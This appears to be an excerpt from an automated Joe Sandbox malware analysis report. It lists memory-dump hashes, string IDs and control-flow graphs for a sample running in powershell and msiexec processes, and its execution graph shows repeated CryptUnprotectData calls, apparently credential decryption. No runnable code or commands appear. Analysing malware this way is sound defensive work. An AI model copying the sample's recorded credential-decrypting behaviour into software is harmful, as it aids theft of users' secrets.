                                                                                                                                        • Source File: 00000001.00000002.2048833272.0000000009410000.00000040.00000800.00020000.00000000.sdmp, Offset: 09410000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_9410000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: tP^q$$^q$$^q$$^q$$^q
                                                                                                                                        • API String ID: 0-324510305
                                                                                                                                        • Opcode ID: cfb6b3a7fad290c81be3310a6eebe3a741a5873eece5b7631ed05b6f2958e281
                                                                                                                                        • Instruction ID: 16e3f518bec777bfd1a5b1382be8e9126df7e8a3a36e5a621bdbb2dee08006ac
                                                                                                                                        • Opcode Fuzzy Hash: cfb6b3a7fad290c81be3310a6eebe3a741a5873eece5b7631ed05b6f2958e281
                                                                                                                                        • Instruction Fuzzy Hash: 00210332E0C258CFDB248F55C980A7ABBF9AF48755B14406BFA049F721CB32D908C761
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: (o^q$(o^q$(o^q$(o^q
                                                                                                                                        • API String ID: 0-1978863864
                                                                                                                                        • Opcode ID: c9dd250bd714ab94f2822253c61b44f58c84b0d4f9d725237c77716413ae0655
                                                                                                                                        • Instruction ID: 7b6bee60673a0c5c67f8c50fe7f5f630a4fa55f0ad879ffb61185d19db06c327
                                                                                                                                        • Opcode Fuzzy Hash: c9dd250bd714ab94f2822253c61b44f58c84b0d4f9d725237c77716413ae0655
                                                                                                                                        • Instruction Fuzzy Hash: 06F15AF1705325DFEF149F28C844BAABBA2EF86311F1484EAE5198F291CB31D846D761
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 84ul$84ul$tP^q$tP^q
                                                                                                                                        • API String ID: 0-2572913987
                                                                                                                                        • Opcode ID: c564c701d11aa344c5aec356d83182a12d1977b597d88d5bec2fb1f57750d176
                                                                                                                                        • Instruction ID: 91a801343367cf863651d593a4a2e4c060cf91fe4fbe81c4ba831d5194074eb8
                                                                                                                                        • Opcode Fuzzy Hash: c564c701d11aa344c5aec356d83182a12d1977b597d88d5bec2fb1f57750d176
                                                                                                                                        • Instruction Fuzzy Hash: F6915BF1B012259BDB185F7888447BABBE2FF85750F1984AAD809DF391CA31D842D7A1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: ,Swl$4'^q$d5gk$xSwl
                                                                                                                                        • API String ID: 0-1526504282
                                                                                                                                        • Opcode ID: d72759a1bb7ca6f92e7d3d7e69049ea0446691623e274a76373d5aaa7c90e233
                                                                                                                                        • Instruction ID: 19b55c160e0c93d06d0b5532b2f9183a9d700237700221b27f8e84804051c739
                                                                                                                                        • Opcode Fuzzy Hash: d72759a1bb7ca6f92e7d3d7e69049ea0446691623e274a76373d5aaa7c90e233
                                                                                                                                        • Instruction Fuzzy Hash: 31310AF0B062268FEB249F68C5486A97BA1EF45740F0980F6D50CAF261CB31E846D7E1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: $^q$$^q$$^q$$^q
                                                                                                                                        • API String ID: 0-2125118731
                                                                                                                                        • Opcode ID: ebeb6f8dc62b6c70dfc2145f8e546b5dbea431eb309a5a9a617747d764463c08
                                                                                                                                        • Instruction ID: 0524ba261c2c82fe69412063e39a84b061ccc9d8f01864ccd0ef8687cf4973c7
                                                                                                                                        • Opcode Fuzzy Hash: ebeb6f8dc62b6c70dfc2145f8e546b5dbea431eb309a5a9a617747d764463c08
                                                                                                                                        • Instruction Fuzzy Hash: 1F2149F131132667FB3859398801B377AD6DBD1791F2488BED50DCB281DE39D8469361
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: $^q$$^q$$^q$$^q
                                                                                                                                        • API String ID: 0-2125118731
                                                                                                                                        • Opcode ID: 88e1e4d303b530f4209430135e9be214d184fb6a301202b69d692bb834f9916c
                                                                                                                                        • Instruction ID: d4483f933f351c8abbd17cc839c59e9e03a407a1e70b67dad6459b5176a42114
                                                                                                                                        • Opcode Fuzzy Hash: 88e1e4d303b530f4209430135e9be214d184fb6a301202b69d692bb834f9916c
                                                                                                                                        • Instruction Fuzzy Hash: 0C21B2F1A062269FFB25AE548944665BBB0EF45650F18C0FBCC088B252DA31C54BE795

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:9%
                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                        Signature Coverage:3.6%
                                                                                                                                        Total number of Nodes:166
                                                                                                                                        Total number of Limit Nodes:17
                                                                                                                                        execution_graph 22249 a0d044 22250 a0d05c 22249->22250 22251 a0d0b6 22250->22251 22254 ed5a9c 22250->22254 22263 ed7bd9 22250->22263 22255 ed5aa7 22254->22255 22256 ed7c49 22255->22256 22258 ed7c39 22255->22258 22288 ed5bc4 22256->22288 22272 ed7e3c 22258->22272 22278 ed7d70 22258->22278 22283 ed7d61 22258->22283 22259 ed7c47 22259->22259 22266 ed7c15 22263->22266 22264 ed7c49 22265 ed5bc4 CallWindowProcW 22264->22265 22268 ed7c47 22265->22268 22266->22264 22267 ed7c39 22266->22267 22269 ed7e3c CallWindowProcW 22267->22269 22270 ed7d61 CallWindowProcW 22267->22270 22271 ed7d70 CallWindowProcW 22267->22271 22268->22268 22269->22268 22270->22268 22271->22268 22273 ed7dfa 22272->22273 22274 ed7e4a 22272->22274 22292 ed7e28 22273->22292 22295 ed7e17 22273->22295 22275 ed7e10 22275->22259 22280 ed7d84 22278->22280 22279 ed7e10 22279->22259 22281 ed7e28 CallWindowProcW 22280->22281 22282 ed7e17 CallWindowProcW 22280->22282 22281->22279 22282->22279 22285 ed7d84 22283->22285 22284 ed7e10 22284->22259 22286 ed7e28 CallWindowProcW 22285->22286 22287 ed7e17 CallWindowProcW 22285->22287 22286->22284 22287->22284 22289 ed5bcf 22288->22289 22290 ed932a CallWindowProcW 22289->22290 22291 ed92d9 22289->22291 22290->22291 22291->22259 22293 ed7e39 22292->22293 22298 ed9260 22292->22298 22293->22275 22296 ed7e39 22295->22296 22297 ed9260 CallWindowProcW 22295->22297 22296->22275 22297->22296 22299 ed5bc4 CallWindowProcW 22298->22299 22300 ed927a 22299->22300 22300->22293 22301 edb458 22302 edb4ac 22301->22302 22303 edb480 22301->22303 22304 edb489 22303->22304 22306 eda964 22303->22306 22307 eda96f 22306->22307 22308 edb7a3 22307->22308 22310 eda980 22307->22310 22308->22302 22311 edb7d8 OleInitialize 22310->22311 22312 edb83c 22311->22312 22312->22308 22313 ed6cd0 22314 ed6d38 CreateWindowExW 22313->22314 22316 ed6df4 22314->22316 22317 ed4420 22319 ed4451 22317->22319 22321 ed4551 22317->22321 22318 ed445d 22319->22318 22326 ed4698 22319->22326 22330 ed4690 22319->22330 22320 ed449d 22334 ed5d91 22320->22334 22344 ed5da0 22320->22344 22354 ed46e8 22326->22354 22363 ed46d8 22326->22363 22327 ed46a2 22327->22320 22331 ed46a2 22330->22331 22332 ed46e8 2 API calls 22330->22332 22333 ed46d8 2 API calls 22330->22333 22331->22320 22332->22331 22333->22331 22335 ed5dcb 22334->22335 22380 ed598c 22335->22380 22337 ed5e32 22341 ed598c GetModuleHandleW 22337->22341 22384 ed6250 22337->22384 22389 ed62d1 22337->22389 22338 ed5e4e 22339 ed3638 GetModuleHandleW 22338->22339 22340 ed5e7a 22338->22340 22339->22340 22341->22338 22345 ed5dcb 22344->22345 22346 ed598c GetModuleHandleW 22345->22346 22347 ed5e32 22346->22347 22351 ed598c GetModuleHandleW 22347->22351 22352 ed62d1 GetModuleHandleW 22347->22352 22353 ed6250 GetModuleHandleW 22347->22353 22348 ed5e4e 22349 ed3638 GetModuleHandleW 22348->22349 22350 ed5e7a 22348->22350 22349->22350 22351->22348 22352->22348 22353->22348 22355 ed46f9 22354->22355 22358 ed471c 22354->22358 22372 ed3638 22355->22372 22358->22327 22359 ed4714 22359->22358 22360 ed4920 GetModuleHandleW 22359->22360 22361 ed494d 22360->22361 22361->22327 22364 ed46f9 22363->22364 22367 ed471c 22363->22367 22365 ed3638 GetModuleHandleW 22364->22365 22366 ed4704 22365->22366 22366->22367 22371 ed4972 GetModuleHandleW 22366->22371 22367->22327 22368 ed4714 22368->22367 22369 ed4920 GetModuleHandleW 22368->22369 22370 ed494d 22369->22370 22370->22327 22371->22368 22373 ed48d8 GetModuleHandleW 22372->22373 22375 ed4704 22373->22375 22375->22358 22376 ed4972 22375->22376 22377 ed4980 22376->22377 22378 ed3638 GetModuleHandleW 22377->22378 22379 ed4994 22378->22379 22379->22359 22381 ed5997 22380->22381 22381->22337 22382 ed626b 22381->22382 22393 ed6461 22381->22393 22382->22337 22385 ed626f 22384->22385 22386 ed626b 22384->22386 22385->22338 22387 ed63ae 22385->22387 22388 ed6461 GetModuleHandleW 22385->22388 22386->22338 22388->22387 22390 ed632d 22389->22390 22391 ed63ae 22390->22391 22392 ed6461 GetModuleHandleW 22390->22392 22392->22391 22394 ed6485 22393->22394 22395 ed3638 GetModuleHandleW 22394->22395 22396 ed64a9 22394->22396 22395->22396 22397 ed3638 GetModuleHandleW 22396->22397 22402 ed6665 22396->22402 22398 ed65eb 22397->22398 22399 ed3638 GetModuleHandleW 22398->22399 22398->22402 22400 ed6639 22399->22400 22401 ed3638 GetModuleHandleW 22400->22401 22400->22402 22401->22402 22402->22382 22403 20f7e018 22404 20f7e024 22403->22404 22408 236ea6e8 22404->22408 22412 236ea6d9 22404->22412 22405 20f7e1d4 22410 236ea70a 22408->22410 22409 236eab99 22409->22405 22410->22409 22416 236eafa1 22410->22416 22414 236ea6e0 22412->22414 22413 236eab99 22413->22405 22414->22413 22415 236eafa1 CryptUnprotectData 22414->22415 22415->22414 22417 236eafb0 22416->22417 22421 236eb5d8 22417->22421 22430 236eb5c9 22417->22430 22418 236eb020 22418->22410 22422 236eb6b1 22421->22422 22423 236eb5fd 22421->22423 22447 236eb300 22422->22447 22423->22422 22427 236eb5d8 CryptUnprotectData 22423->22427 22429 236eb5c9 CryptUnprotectData 22423->22429 22439 236eb7b8 22423->22439 22443 236eb828 22423->22443 22427->22422 22429->22422 22431 236eb5d8 22430->22431 22432 236eb6b1 22431->22432 22435 236eb7b8 CryptUnprotectData 22431->22435 22436 236eb5d8 CryptUnprotectData 22431->22436 22437 236eb828 CryptUnprotectData 22431->22437 22438 236eb5c9 CryptUnprotectData 22431->22438 22433 236eb300 CryptUnprotectData 22432->22433 22434 236eb87d 22433->22434 22434->22418 22435->22432 22436->22432 22437->22432 22438->22432 22440 236eb7cd 22439->22440 22441 236eb300 CryptUnprotectData 22440->22441 22442 236eb87d 22441->22442 22442->22422 22444 236eb845 22443->22444 22445 236eb300 CryptUnprotectData 22444->22445 22446 236eb87d 22445->22446 22446->22422 22448 236eba68 CryptUnprotectData 22447->22448 22449 236eb87d 22448->22449 22449->22418

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 523 20f7c147-20f7c158 524 20f7c184 523->524 525 20f7c15a-20f7c172 523->525 526 20f7c186-20f7c18a 524->526 529 20f7c174-20f7c179 525->529 530 20f7c17b-20f7c17e 525->530 529->526 531 20f7c180-20f7c182 530->531 532 20f7c18b-20f7c199 530->532 531->524 531->525 534 20f7c1b3-20f7c1b8 532->534 535 20f7c19b-20f7c1a1 532->535 537 20f7c1bb-20f7c1c8 534->537 535->537 538 20f7c1a3-20f7c1b2 535->538 539 20f7c1cf-20f7c2ac call 20f741a0 call 20f73cc0 537->539 540 20f7c1ca 537->540 538->534 550 20f7c2b3-20f7c2d4 call 20f75658 539->550 551 20f7c2ae 539->551 540->539 553 20f7c2d9-20f7c2e4 550->553 551->550 554 20f7c2e6 553->554 555 20f7c2eb-20f7c2ef 553->555 554->555 556 20f7c2f4-20f7c2fb 555->556 557 20f7c2f1-20f7c2f2 555->557 558 20f7c302-20f7c310 556->558 559 20f7c2fd 556->559 560 20f7c313-20f7c357 557->560 558->560 559->558 564 20f7c3bd-20f7c3d4 560->564 566 20f7c3d6-20f7c3fb 564->566 567 20f7c359-20f7c36f 564->567 574 20f7c413 566->574 575 20f7c3fd-20f7c412 566->575 571 20f7c371-20f7c37d 567->571 572 20f7c399 567->572 576 20f7c387-20f7c38d 571->576 577 20f7c37f-20f7c385 571->577 573 20f7c39f-20f7c3bc 572->573 573->564 575->574 578 20f7c397 576->578 577->578 578->573
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                        • API String ID: 0-1487592376
                                                                                                                                        • Opcode ID: c09fa84dd09bcb0cc3c74fbd95a60fcbee8cc5058a6187fc52c67090014126f5
                                                                                                                                        • Instruction ID: 9310d45809d8a190490f75a0dbacb8567c32edf9cbfe078cfd1e64ac494a31df
                                                                                                                                        • Opcode Fuzzy Hash: c09fa84dd09bcb0cc3c74fbd95a60fcbee8cc5058a6187fc52c67090014126f5
                                                                                                                                        • Instruction Fuzzy Hash: 01A1D775E40218DFEB04CFA9D894A9DBBF2BF89310F14C06AE908AB365DB749941CF51

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 645 20f75369-20f753a0 646 20f753a7-20f75484 call 20f741a0 call 20f73cc0 645->646 647 20f753a2 645->647 657 20f75486 646->657 658 20f7548b-20f754a9 646->658 647->646 657->658 688 20f754ac call 20f75649 658->688 689 20f754ac call 20f75658 658->689 659 20f754b2-20f754bd 660 20f754c4-20f754c8 659->660 661 20f754bf 659->661 662 20f754cd-20f754d4 660->662 663 20f754ca-20f754cb 660->663 661->660 665 20f754d6 662->665 666 20f754db-20f754e9 662->666 664 20f754ec-20f75530 663->664 670 20f75596-20f755ad 664->670 665->666 666->664 672 20f75532-20f75548 670->672 673 20f755af-20f755d4 670->673 677 20f75572 672->677 678 20f7554a-20f75556 672->678 679 20f755d6-20f755eb 673->679 680 20f755ec 673->680 683 20f75578-20f75595 677->683 681 20f75560-20f75566 678->681 682 20f75558-20f7555e 678->682 679->680 684 20f75570 681->684 682->684 683->670 684->683 688->659 689->659
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                        • API String ID: 0-1487592376
                                                                                                                                        • Opcode ID: 8884477b44c8b7d1c85c8692d9e8915f484405120204985d9f529f0882072833
                                                                                                                                        • Instruction ID: 3fdc77ea7c12aff607e42166d57f214b3afde082ccc555db3fcc2f38384bf8ed
                                                                                                                                        • Opcode Fuzzy Hash: 8884477b44c8b7d1c85c8692d9e8915f484405120204985d9f529f0882072833
                                                                                                                                        • Instruction Fuzzy Hash: C781D674E40218DFDB14CFA9C994A9DBBF2BF89310F14C06AE808AB365DB749985CF51

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 690 20f7c468-20f7c471 691 20f7c473-20f7c488 690->691 692 20f7c48b-20f7c498 690->692 691->692 693 20f7c49f-20f7c57c call 20f741a0 call 20f73cc0 692->693 694 20f7c49a 692->694 704 20f7c583-20f7c5a4 call 20f75658 693->704 705 20f7c57e 693->705 694->693 707 20f7c5a9-20f7c5b4 704->707 705->704 708 20f7c5b6 707->708 709 20f7c5bb-20f7c5bf 707->709 708->709 710 20f7c5c4-20f7c5cb 709->710 711 20f7c5c1-20f7c5c2 709->711 712 20f7c5d2-20f7c5e0 710->712 713 20f7c5cd 710->713 714 20f7c5e3-20f7c627 711->714 712->714 713->712 718 20f7c68d-20f7c6a4 714->718 720 20f7c6a6-20f7c6cb 718->720 721 20f7c629-20f7c63f 718->721 728 20f7c6e3 720->728 729 20f7c6cd-20f7c6e2 720->729 725 20f7c641-20f7c64d 721->725 726 20f7c669 721->726 730 20f7c657-20f7c65d 725->730 731 20f7c64f-20f7c655 725->731 727 20f7c66f-20f7c68c 726->727 727->718 729->728 732 20f7c667 730->732 731->732 732->727
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                        • API String ID: 0-1487592376
                                                                                                                                        • Opcode ID: b12ca901d23d355dfd06587ef76aaea5a06282a9134949075fdc0a752fca1144
                                                                                                                                        • Instruction ID: 00f7fc96073154bb6906165023947c737da9943b8038ecf4272b58e897762e7f
                                                                                                                                        • Opcode Fuzzy Hash: b12ca901d23d355dfd06587ef76aaea5a06282a9134949075fdc0a752fca1144
                                                                                                                                        • Instruction Fuzzy Hash: 9381D674E40218DFEB14CFA9C984A9DBBF2BF88310F14C06AE818AB365DB745981CF51

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 736 20f7d278-20f7d2a8 737 20f7d2af-20f7d38c call 20f741a0 call 20f73cc0 736->737 738 20f7d2aa 736->738 748 20f7d393-20f7d3b4 call 20f75658 737->748 749 20f7d38e 737->749 738->737 751 20f7d3b9-20f7d3c4 748->751 749->748 752 20f7d3c6 751->752 753 20f7d3cb-20f7d3cf 751->753 752->753 754 20f7d3d4-20f7d3db 753->754 755 20f7d3d1-20f7d3d2 753->755 757 20f7d3e2-20f7d3f0 754->757 758 20f7d3dd 754->758 756 20f7d3f3-20f7d437 755->756 762 20f7d49d-20f7d4b4 756->762 757->756 758->757 764 20f7d4b6-20f7d4db 762->764 765 20f7d439-20f7d44f 762->765 771 20f7d4f3 764->771 772 20f7d4dd-20f7d4f2 764->772 769 20f7d451-20f7d45d 765->769 770 20f7d479 765->770 773 20f7d467-20f7d46d 769->773 774 20f7d45f-20f7d465 769->774 775 20f7d47f-20f7d49c 770->775 772->771 776 20f7d477 773->776 774->776 775->762 776->775
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                        • API String ID: 0-1487592376
                                                                                                                                        • Opcode ID: 32f649ba0cd00f410df9c34f135c0bb337f57547e21806dadad690e9ef2ef173
                                                                                                                                        • Instruction ID: c9e7506165f5aad9f990f01d2b87a6891f56502ae02160815f3db6d2f640643d
                                                                                                                                        • Opcode Fuzzy Hash: 32f649ba0cd00f410df9c34f135c0bb337f57547e21806dadad690e9ef2ef173
                                                                                                                                        • Instruction Fuzzy Hash: 3381C375E40218DFDB14DFA9C884A9DBBF2BF89310F54C06AE818AB365DB746981CF11

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 780 20f7ca08-20f7ca38 782 20f7ca3f-20f7cb1c call 20f741a0 call 20f73cc0 780->782 783 20f7ca3a 780->783 793 20f7cb23-20f7cb44 call 20f75658 782->793 794 20f7cb1e 782->794 783->782 796 20f7cb49-20f7cb54 793->796 794->793 797 20f7cb56 796->797 798 20f7cb5b-20f7cb5f 796->798 797->798 799 20f7cb64-20f7cb6b 798->799 800 20f7cb61-20f7cb62 798->800 802 20f7cb72-20f7cb80 799->802 803 20f7cb6d 799->803 801 20f7cb83-20f7cbc7 800->801 807 20f7cc2d-20f7cc44 801->807 802->801 803->802 809 20f7cc46-20f7cc6b 807->809 810 20f7cbc9-20f7cbdf 807->810 816 20f7cc83 809->816 817 20f7cc6d-20f7cc82 809->817 814 20f7cbe1-20f7cbed 810->814 815 20f7cc09 810->815 818 20f7cbf7-20f7cbfd 814->818 819 20f7cbef-20f7cbf5 814->819 820 20f7cc0f-20f7cc2c 815->820 817->816 821 20f7cc07 818->821 819->821 820->807 821->820
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                        • API String ID: 0-1487592376
                                                                                                                                        • Opcode ID: cbe810ee25adf04507946f8289eda3678851234f80957622ee331474f5a58b3b
                                                                                                                                        • Instruction ID: d09a61f8af7141b820a71bc13358f5d4ab8aeb48e139928a5220324b27f93915
                                                                                                                                        • Opcode Fuzzy Hash: cbe810ee25adf04507946f8289eda3678851234f80957622ee331474f5a58b3b
                                                                                                                                        • Instruction Fuzzy Hash: 9981B674E40258DFEB14DFA9C894A9DBBF2BF88310F14C06AE818AB365DB745981CF51

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 825 20f7ccd8-20f7cd08 826 20f7cd0f-20f7cdec call 20f741a0 call 20f73cc0 825->826 827 20f7cd0a 825->827 837 20f7cdf3-20f7ce14 call 20f75658 826->837 838 20f7cdee 826->838 827->826 840 20f7ce19-20f7ce24 837->840 838->837 841 20f7ce26 840->841 842 20f7ce2b-20f7ce2f 840->842 841->842 843 20f7ce34-20f7ce3b 842->843 844 20f7ce31-20f7ce32 842->844 846 20f7ce42-20f7ce50 843->846 847 20f7ce3d 843->847 845 20f7ce53-20f7ce97 844->845 851 20f7cefd-20f7cf14 845->851 846->845 847->846 853 20f7cf16-20f7cf3b 851->853 854 20f7ce99-20f7ceaf 851->854 860 20f7cf53 853->860 861 20f7cf3d-20f7cf52 853->861 858 20f7ceb1-20f7cebd 854->858 859 20f7ced9 854->859 862 20f7cec7-20f7cecd 858->862 863 20f7cebf-20f7cec5 858->863 864 20f7cedf-20f7cefc 859->864 861->860 865 20f7ced7 862->865 863->865 864->851 865->864
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                        • API String ID: 0-1487592376
                                                                                                                                        • Opcode ID: 70f938695f33b90862c3baf06211cd3445f616c4eb8315907e6fae3e5a9fe932
                                                                                                                                        • Instruction ID: f91a922ca9b963e372c9540eeb30116c8a88f8f4dfac11dde542b0c4b6754d9d
                                                                                                                                        • Opcode Fuzzy Hash: 70f938695f33b90862c3baf06211cd3445f616c4eb8315907e6fae3e5a9fe932
                                                                                                                                        • Instruction Fuzzy Hash: 3E81C674E40218DFEB14DFA9C984A9DBBF2BF88310F14C06AE818AB365DB745981CF51

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 869 20f7c738-20f7c768 870 20f7c76f-20f7c84c call 20f741a0 call 20f73cc0 869->870 871 20f7c76a 869->871 881 20f7c853-20f7c874 call 20f75658 870->881 882 20f7c84e 870->882 871->870 884 20f7c879-20f7c884 881->884 882->881 885 20f7c886 884->885 886 20f7c88b-20f7c88f 884->886 885->886 887 20f7c894-20f7c89b 886->887 888 20f7c891-20f7c892 886->888 890 20f7c8a2-20f7c8b0 887->890 891 20f7c89d 887->891 889 20f7c8b3-20f7c8f7 888->889 895 20f7c95d-20f7c974 889->895 890->889 891->890 897 20f7c976-20f7c99b 895->897 898 20f7c8f9-20f7c90f 895->898 904 20f7c9b3 897->904 905 20f7c99d-20f7c9b2 897->905 902 20f7c911-20f7c91d 898->902 903 20f7c939 898->903 906 20f7c927-20f7c92d 902->906 907 20f7c91f-20f7c925 902->907 908 20f7c93f-20f7c95c 903->908 905->904 909 20f7c937 906->909 907->909 908->895 909->908
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                        • API String ID: 0-1487592376
                                                                                                                                        • Opcode ID: a296be7cf4a68291e43086ddef942a53e331dcea9f6424614ab060fc4a1b73e9
                                                                                                                                        • Instruction ID: ebb43dc281fa90c977ee86e7a9022e124724792e6d8c058ae4014daaa9dadbe5
                                                                                                                                        • Opcode Fuzzy Hash: a296be7cf4a68291e43086ddef942a53e331dcea9f6424614ab060fc4a1b73e9
                                                                                                                                        • Instruction Fuzzy Hash: F581D774E40218DFEB04DFA9C994A9DBBF2BF88300F14C06AE918AB365DB749941CF51

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 913 20f7cfab-20f7cfd8 914 20f7cfdf-20f7d0bc call 20f741a0 call 20f73cc0 913->914 915 20f7cfda 913->915 925 20f7d0c3-20f7d0e4 call 20f75658 914->925 926 20f7d0be 914->926 915->914 928 20f7d0e9-20f7d0f4 925->928 926->925 929 20f7d0f6 928->929 930 20f7d0fb-20f7d0ff 928->930 929->930 931 20f7d104-20f7d10b 930->931 932 20f7d101-20f7d102 930->932 934 20f7d112-20f7d120 931->934 935 20f7d10d 931->935 933 20f7d123-20f7d167 932->933 939 20f7d1cd-20f7d1e4 933->939 934->933 935->934 941 20f7d1e6-20f7d20b 939->941 942 20f7d169-20f7d17f 939->942 948 20f7d223 941->948 949 20f7d20d-20f7d222 941->949 946 20f7d181-20f7d18d 942->946 947 20f7d1a9 942->947 950 20f7d197-20f7d19d 946->950 951 20f7d18f-20f7d195 946->951 952 20f7d1af-20f7d1cc 947->952 949->948 953 20f7d1a7 950->953 951->953 952->939 953->952
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2957083648.0000000020F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 20F70000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_20f70000_msiexec.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                        • API String ID: 0-1487592376
